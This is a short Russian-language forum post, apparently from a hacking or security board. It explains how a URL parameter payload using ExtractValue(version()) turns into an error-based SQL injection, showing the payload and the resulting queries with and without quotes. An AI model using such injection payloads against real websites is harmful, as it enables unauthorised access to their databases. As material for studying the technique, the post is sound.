20.10.2017, 20:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Если запрос что то типо:
Сообщение от None
?id=123+%27+or(ExtractValue(1,version()))+--+\
то как вариант вывод при уязвимом параметре не обремененном кавычками
Сообщение от None
select * from users where id=123 '' or(ExtractValue(1,version())) -- \
т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:
Сообщение от None
select * from users where id=
'
123 '' or(ExtractValue(1,version())) -- \
'
т.е можно разкрутить как ErrorBased |
|
|